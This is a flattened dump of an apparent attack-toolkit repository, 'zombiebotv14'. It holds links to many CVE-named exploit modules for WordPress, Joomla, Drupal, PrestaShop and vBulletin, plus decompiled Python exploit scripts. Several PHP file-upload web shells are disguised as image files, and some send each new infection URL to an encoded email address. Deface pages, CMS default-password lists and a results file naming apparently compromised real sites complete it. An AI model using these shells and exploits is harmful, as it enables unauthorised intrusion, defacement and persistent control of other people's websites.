/Files/Tool1/Exploits/Presta_soopabanners.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_soopabanners.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_soopamobile.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_soopamobile.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_addblockblocker.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_addblockblocker.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wp_dzs_videogallery.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wp_dzs_videogallery.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/viral_optinsExploit.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/viral_optinsExploit.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/wp_miniaudioplayer.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/wp_miniaudioplayer.pyc -------------------------------------------------------------------------------- /Files/Tool1/Tools/wsoShellUploaderModule.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Tools/wsoShellUploaderModule.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2006_2529fckeditor.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2006_2529fckeditor.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2015_8562RCEjoomla.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2015_8562RCEjoomla.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2017_16562userpro.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2017_16562userpro.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2017_9841PHPUnit.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2017_9841PHPUnit.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Com_simplephotogallery.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Com_simplephotogallery.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_advancedslider.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_advancedslider.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_columnadverts.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_columnadverts.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_fieldvmegamenu.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_fieldvmegamenu.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_simpleslideshow.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_simpleslideshow.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_vtermslideshow.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_vtermslideshow.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_wdoptionpanel.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_wdoptionpanel.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/WpCateGory_page_icons.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/WpCateGory_page_icons.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Wpwoocommercesoftware.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Wpwoocommercesoftware.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/cartabandonmentproOld.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/cartabandonmentproOld.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/mod_simplefileuploadv1.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/mod_simplefileuploadv1.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/wp_content_injection.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/wp_content_injection.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2019_9879wp_graphql.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2019_9879wp_graphql.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_homepageadvertise.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_homepageadvertise.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_nvn_export_orders.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_nvn_export_orders.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2015_4455_gravityforms.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2015_4455_gravityforms.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2015_5151_revsliderCSS.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2015_5151_revsliderCSS.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2015_8562RCEjoomla2019.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2015_8562RCEjoomla2019.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2018_7600Drupalgeddon2.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2018_7600Drupalgeddon2.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2019_16759vBulletinRCE.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2019_16759vBulletinRCE.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2019_6340Drupal8RESTful.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2019_6340Drupal8RESTful.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2019_9978SocialWarfare.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2019_9978SocialWarfare.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_1attributewizardpro.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_1attributewizardpro.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_attributewizardpro.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_attributewizardpro.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_attributewizardpro3.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_attributewizardpro3.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_attributewizardpro_x.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_attributewizardpro_x.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_cartabandonmentpro.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_cartabandonmentpro.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_homepageadvertise2.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_homepageadvertise2.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_productpageadverts.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_productpageadverts.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_tdpsthemeoptionpanel.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_tdpsthemeoptionpanel.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2008_3362Download_Manager.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2008_3362Download_Manager.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2014_3704Drupal_add_Admin.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2014_3704Drupal_add_Admin.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2014_9735_revsliderShell.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2014_9735_revsliderShell.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2016_9838TakeAdminJoomla.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2016_9838TakeAdminJoomla.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_jro_homepageadvertise.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_jro_homepageadvertise.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_psmodthemeoptionpanel.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_psmodthemeoptionpanel.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/WooCommerce_ProductAddonsExp.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/WooCommerce_ProductAddonsExp.pyc -------------------------------------------------------------------------------- /Files/Tool1/files/rock.jpg: -------------------------------------------------------------------------------- 1 |

Vuln!! patch it now!

-------------------------------------------------------------------------------- /Files/Tool1/files/vuln.htm: -------------------------------------------------------------------------------- 1 |

Hacked By Viper 1337

-------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2015_4455_gravityformsindex.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2015_4455_gravityformsindex.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2018_19207wp_gdpr_compliance.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2018_19207wp_gdpr_compliance.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/Presta_wg24themeadministration.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/Presta_wg24themeadministration.pyc -------------------------------------------------------------------------------- /Files/Tool1/Exploits/CVE_2020_8772_wpInfinitewp_authBypass.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Shamsuzzaman321/zombiebotv14/HEAD/Files/Tool1/Exploits/CVE_2020_8772_wpInfinitewp_authBypass.pyc -------------------------------------------------------------------------------- /Files/Tool11/Result/index.txt: -------------------------------------------------------------------------------- 1 | http://bomdesexo.com.br/wp-content/_input_3_raiz0.php5 2 | http://www.takatransfer.com/wp-content/_input_3_raiz0.php5 3 | http://www.aviancebd.com/wp-content/_input_3_raiz0.php5 4 | -------------------------------------------------------------------------------- /Files/Tool1/Tools/__init__.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Tools\__init__.py 6 | pass -------------------------------------------------------------------------------- /Files/Tool20/Update.txt: -------------------------------------------------------------------------------- 1 | Contact For Latest Updated: 2 | 3 | My Facebook Page: https://www.fb.com/viper1337official/ 4 | 5 | Email : nedjworgan@gmail.com 6 | 7 | ICQ: @viper1337official 8 | 9 | Telegram: https://t.me/Viper1337official -------------------------------------------------------------------------------- /Files/Tool1/cms/Wordpress.txt: -------------------------------------------------------------------------------- 1 | ddecode.com/hexdecoder/?results=d768fc2841356982f6462a984559605a 2 | ddecode.com/hexdecoder/?results=d768fc2841356982f6462a984559605a 3 | contactsaumaroc.wordpress.com/?taxonomy=link_category&term=blogroll 4 | contactsaumaroc.wordpress.com/?taxonomy=link_category&term=blogroll 5 | themesforblogger.com/?product=theme-junkie-flatline-wordpress-theme-1-0-7 6 | -------------------------------------------------------------------------------- /Files/Tool1/files/up.php: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! Hacked by Viper1337';echo '';if( $_POST['_upl'] == "Upload" ) {if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; }else { echo 'Not uploaded !

'; }}?> -------------------------------------------------------------------------------- /Files/Tool1/files/shcode.txt: -------------------------------------------------------------------------------- 1 | wordpress_project 2 | '; 4 | echo ''; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 7 | else { echo 'Not uploaded !

'; } 8 | } 9 | ?> 10 | -------------------------------------------------------------------------------- /Files/Tool1/files/shell.jpg: -------------------------------------------------------------------------------- 1 | Vuln!! patch it Now! 2 | '; 4 | echo ''; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 7 | else { echo 'Not uploaded !

'; } 8 | } 9 | ?> 10 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # zombiebotv14 2 | python based latest zombie bot v.14 3 | ##Install Python 2.7 To Run All Tools 4 | 5 | ##Module : 6 | 7 | ##-pip3 install -r requirements.txt 8 | 9 | ##[Zombi Bot V14 - Only work for python 2.7] 10 | 11 | ##Module : 12 | 13 | ##-pip install request 14 | ##-pip install requests 15 | ##-pip install colorama 16 | ##-pip install bs4 17 | ##-pip install tldextract 18 | 19 | Educational purpose only use it with your risk 20 | ![Ekran Alıntısı](https://user-images.githubusercontent.com/42300174/112203000-3b8db080-8c3c-11eb-83b4-b13a7129c9c5.PNG) 21 | 22 | -------------------------------------------------------------------------------- /Files/Tool11/files/raiz0.php5: -------------------------------------------------------------------------------- 1 |

'; 3 | if( $_POST['_upl'] == "U" ) { 4 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '#1~'; } 5 | else { echo '#0~'; } 6 | } $kkk5591499kk = 'Z2Vzc3J6bHRzQGdtYWlsLmNvbQ=='; $ka491kk = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; @mail(base64_decode($kkk5591499kk), "New Shell", $ka491kk); 7 | ?> -------------------------------------------------------------------------------- /Files/Tool19/dup.py: -------------------------------------------------------------------------------- 1 | import sys 2 | red = '\033[91m' 3 | green = '\033[92m' 4 | white = '\033[00m' 5 | 6 | get = open(raw_input("Give Me List: "), "r").read().splitlines() 7 | 8 | liste = [] 9 | try: 10 | for sites in get: 11 | dhon = sites 12 | sites = sites.replace("https://", "") 13 | sites = sites.replace("http://", "") 14 | sites = sites.replace("www.", "") 15 | sites = sites.split("/") 16 | sites = sites[0] 17 | if sites not in liste: 18 | liste.append(sites) 19 | open("Result/Cleannoduplacted.txt", "a").write('info@'+dhon + "\n") 20 | print("Finished, success , Thank you for using Viper1337 Tool --> Result/Cleannoduplacted") 21 | except: 22 | pass -------------------------------------------------------------------------------- /Files/Tool1/files/DefaultPasswords_Drupal.txt: -------------------------------------------------------------------------------- 1 | admin 2 | 123456 3 | pass 4 | password 5 | admin123 6 | 12345 7 | admin@123 8 | 123 9 | test 10 | 123456789 11 | 1234 12 | 12345678 13 | 123123 14 | demo 15 | blah 16 | hello 17 | 1234567890 18 | zx321654xz 19 | 1234567 20 | adminadmin 21 | xxx 22 | ricsky789.. 23 | 1q2w3e4r 24 | xmagico 25 | admin1234 26 | logitech 27 | p@ssw0rd 28 | a 29 | test123 30 | root 31 | pass123 32 | password1 33 | qwerty 34 | 111111 35 | gimboroot 36 | joomla 37 | test1 38 | opencart 39 | changeme 40 | temporal 41 | 1qaz2wsx 42 | zxx321654xxz 43 | 1111 44 | abc123 45 | P@ssw0rd 46 | 123321 47 | admin1 48 | password123 49 | qwerty123 50 | admin888 51 | qwe123 52 | admin01 53 | admin12345 54 | test1234 55 | pass1234 56 | 00 57 | admin!@# 58 | 112233 59 | guest 60 | q1w2e3r4 -------------------------------------------------------------------------------- /Files/Tool1/files/DefaultPasswords_Joomla.txt: -------------------------------------------------------------------------------- 1 | admin 2 | 123456 3 | pass 4 | password 5 | admin123 6 | 12345 7 | admin@123 8 | 123 9 | test 10 | 123456789 11 | 1234 12 | 12345678 13 | 123123 14 | demo 15 | blah 16 | hello 17 | 1234567890 18 | zx321654xz 19 | 1234567 20 | adminadmin 21 | xxx 22 | ricsky789.. 23 | 1q2w3e4r 24 | xmagico 25 | admin1234 26 | logitech 27 | p@ssw0rd 28 | a 29 | test123 30 | root 31 | pass123 32 | password1 33 | qwerty 34 | 111111 35 | gimboroot 36 | joomla 37 | test1 38 | opencart 39 | changeme 40 | temporal 41 | 1qaz2wsx 42 | zxx321654xxz 43 | 1111 44 | abc123 45 | P@ssw0rd 46 | 123321 47 | admin1 48 | password123 49 | qwerty123 50 | admin888 51 | qwe123 52 | admin01 53 | admin12345 54 | test1234 55 | pass1234 56 | 00 57 | admin!@# 58 | 112233 59 | guest 60 | q1w2e3r4 -------------------------------------------------------------------------------- /Files/Tool1/files/DefaultPasswords_Wordpress.txt: -------------------------------------------------------------------------------- 1 | admin 2 | 123456 3 | pass 4 | password 5 | admin123 6 | 12345 7 | admin@123 8 | 123 9 | test 10 | 123456789 11 | 1234 12 | 12345678 13 | 123123 14 | demo 15 | blah 16 | hello 17 | 1234567890 18 | zx321654xz 19 | 1234567 20 | adminadmin 21 | xxx 22 | ricsky789.. 23 | 1q2w3e4r 24 | xmagico 25 | admin1234 26 | logitech 27 | p@ssw0rd 28 | a 29 | test123 30 | root 31 | pass123 32 | password1 33 | qwerty 34 | 111111 35 | gimboroot 36 | joomla 37 | test1 38 | opencart 39 | changeme 40 | temporal 41 | 1qaz2wsx 42 | zxx321654xxz 43 | 1111 44 | abc123 45 | P@ssw0rd 46 | 123321 47 | admin1 48 | password123 49 | qwerty123 50 | admin888 51 | qwe123 52 | admin01 53 | admin12345 54 | test1234 55 | pass1234 56 | 00 57 | admin!@# 58 | 112233 59 | guest 60 | q1w2e3r4 -------------------------------------------------------------------------------- /Files/Tool1/files/DefaultPasswords_opencart.txt: -------------------------------------------------------------------------------- 1 | admin 2 | 123456 3 | pass 4 | password 5 | admin123 6 | 12345 7 | admin@123 8 | 123 9 | test 10 | 123456789 11 | 1234 12 | 12345678 13 | 123123 14 | demo 15 | blah 16 | hello 17 | 1234567890 18 | zx321654xz 19 | 1234567 20 | adminadmin 21 | xxx 22 | ricsky789.. 23 | 1q2w3e4r 24 | xmagico 25 | admin1234 26 | logitech 27 | p@ssw0rd 28 | a 29 | test123 30 | root 31 | pass123 32 | password1 33 | qwerty 34 | 111111 35 | gimboroot 36 | joomla 37 | test1 38 | opencart 39 | changeme 40 | temporal 41 | 1qaz2wsx 42 | zxx321654xxz 43 | 1111 44 | abc123 45 | P@ssw0rd 46 | 123321 47 | admin1 48 | password123 49 | qwerty123 50 | admin888 51 | qwe123 52 | admin01 53 | admin12345 54 | test1234 55 | pass1234 56 | 00 57 | admin!@# 58 | 112233 59 | guest 60 | q1w2e3r4 -------------------------------------------------------------------------------- /Files/Tool11/files/XxX.php: -------------------------------------------------------------------------------- 1 | Viper1337 2 | '; 4 | echo ''; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 7 | else { echo 'Not uploaded !

'; } 8 | } $kkk5591499kk = 'Z2Vzc3J6bHRzQGdtYWlsLmNvbQ=='; $ka491kk = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; @mail(base64_decode($kkk5591499kk), "New Shell", $ka491kk); 9 | ?> 10 | -------------------------------------------------------------------------------- /Files/Tool11/files/up.php: -------------------------------------------------------------------------------- 1 | Viper1337 2 | '; 4 | echo ''; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 7 | else { echo 'Not uploaded !

'; } 8 | } $kkk5591499kk = 'Z2Vzc3J6bHRzQGdtYWlsLmNvbQ=='; $ka491kk = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; @mail(base64_decode($kkk5591499kk), "New Shell", $ka491kk); 9 | ?> 10 | -------------------------------------------------------------------------------- /Files/Tool11/files/vuln.php: -------------------------------------------------------------------------------- 1 | Viper1337 2 | '; 4 | echo ''; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 7 | else { echo 'Not uploaded !

'; } 8 | } $kkk5591499kk = 'Z2Vzc3J6bHRzQGdtYWlsLmNvbQ=='; $ka491kk = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; @mail(base64_decode($kkk5591499kk), "New Shell", $ka491kk); 9 | ?> 10 | -------------------------------------------------------------------------------- /Files/Tool1/files/banner.txt: -------------------------------------------------------------------------------- 1 | 2 | ______ _ _ ____ _ __ __ __ _ _ 3 | |___ / | | (_) | _ \ | | \ \ / / /_ | | || | 4 | / / ___ _ __ ___ | |__ _ | |_) | ___ | |_ \ \ / / | | | || |_ 5 | / / / _ \ | '_ ` _ \ | '_ \ | | | _ < / _ \ | __| \ \/ / | | |__ _| 6 | / /__ | (_) | | | | | | | | |_) | | | | |_) | | (_) | | |_ \ / | | | | 7 | /_____| \___/ |_| |_| |_| |_.__/ |_| |____/ \___/ \__| \/ |_| |_| 8 | 9 | ICQ: @viper1337official 10 | -------------------------------------------------------------------------------- /Files/Tool11/files/root.php: -------------------------------------------------------------------------------- 1 | Viper 1337 Uploader 2 | '; 4 | echo ''; 5 | if( $_POST['_upl'] == "Upload" ) { 6 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 7 | else { echo 'Not uploaded !

'; } 8 | } $kkk5591499kk = 'Z2Vzc3J6bHRzQGdtYWlsLmNvbQ=='; $ka491kk = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; @mail(base64_decode($kkk5591499kk), "New Shell", $ka491kk); 9 | ?> 10 | 11 | -------------------------------------------------------------------------------- /Files/Tool11/files/shell.gif: -------------------------------------------------------------------------------- 1 | Viper1337 2 | Whoops Got OwNed?! 3 | '; 5 | echo ''; 6 | if( $_POST['_upl'] == "Upload" ) { 7 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Shell Uploaded ! :)

'; } 8 | else { echo 'Not uploaded !

'; } 9 | } $kkk5591499kk = 'Z2Vzc3J6bHRzQGdtYWlsLmNvbQ=='; $ka491kk = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; @mail(base64_decode($kkk5591499kk), "New Shell", $ka491kk); 10 | ?> -------------------------------------------------------------------------------- /Files/Tool11/files/098.php: -------------------------------------------------------------------------------- 1 | Viper 1337 Bot 2 | 3 | '; 6 | 7 | echo ''; 8 | 9 | if( $_POST['_upl'] == "Upload" ) 10 | { 11 | 12 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) 13 | { 14 | echo 'Shell Uploaded ! :)

'; 15 | } 16 | 17 | else 18 | { 19 | echo 'Not uploaded !

'; 20 | } 21 | 22 | } $kkk5591499kk = 'Z2Vzc3J6bHRzQGdtYWlsLmNvbQ=='; $ka491kk = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; @mail(base64_decode($kkk5591499kk), "New Shell", $ka491kk); 23 | ?> 24 | -------------------------------------------------------------------------------- /Files/Tool11/files/raiz0.php: -------------------------------------------------------------------------------- 1 | Viper 1337 2 | 3 | '; 6 | 7 | echo ''; 8 | 9 | if( $_POST['_upl'] == "Upload" ) 10 | { 11 | 12 | if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) 13 | { 14 | echo 'Shell Uploaded ! :)

'; 15 | } 16 | 17 | else 18 | { 19 | echo 'Not uploaded !

'; 20 | } 21 | 22 | } 23 | $kkk5591499kk = 'Z2Vzc3J6bHRzQGdtYWlsLmNvbQ=='; $ka491kk = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; @mail(base64_decode($kkk5591499kk), "New Shell", $ka491kk); 24 | ?> -------------------------------------------------------------------------------- /Files/Tool1/Exploits/phpunit.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\phpunit.py 6 | import requests 7 | from Exploits import CVE_2017_9841PHPUnit 8 | from Exploits import printModule 9 | r = '\x1b[31m' 10 | g = '\x1b[32m' 11 | y = '\x1b[33m' 12 | b = '\x1b[34m' 13 | m = '\x1b[35m' 14 | c = '\x1b[36m' 15 | w = '\x1b[37m' 16 | Headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' 17 | } 18 | 19 | def Exploit(site, CMS): 20 | try: 21 | vv = site + '/vendor/phpunit/phpunit/build.xml' 22 | Exp = '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php' 23 | CheckVuln = requests.get('http://{}'.format(vv), timeout=10, headers=Headers) 24 | if 'taskname="phpunit"' in str(CheckVuln.content): 25 | return CVE_2017_9841PHPUnit.Exploit(site, Exp, '', CMS) 26 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit', CMS) 27 | except: 28 | return printModule.returnNo(site, 'CVE-2017-9841', 'PHPUnit', CMS) -------------------------------------------------------------------------------- /Files/Tool1/Exploits/megamenu.py: -------------------------------------------------------------------------------- 1 | # uncompyle6 version 2.11.5 2 | # Python bytecode 2.7 (62211) 3 | # Decompiled from: Python 2.7.18 (default, Apr 20 2020, 20:30:41) 4 | # [GCC 9.3.0] 5 | # Embedded file name: Exploits\megamenu.py 6 | import requests 7 | from Exploits import printModule 8 | Headers = {'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0' 9 | } 10 | 11 | def Exploit(site): 12 | try: 13 | PostFile = {'Filedata': open('files/up.php', 'rb') 14 | } 15 | requests.post('http://' + site + '/modules/megamenu/uploadify/uploadify.php?folder=modules/megamenu/uploadify/"', files=PostFile, timeout=10, headers=Headers) 16 | CheckShell = 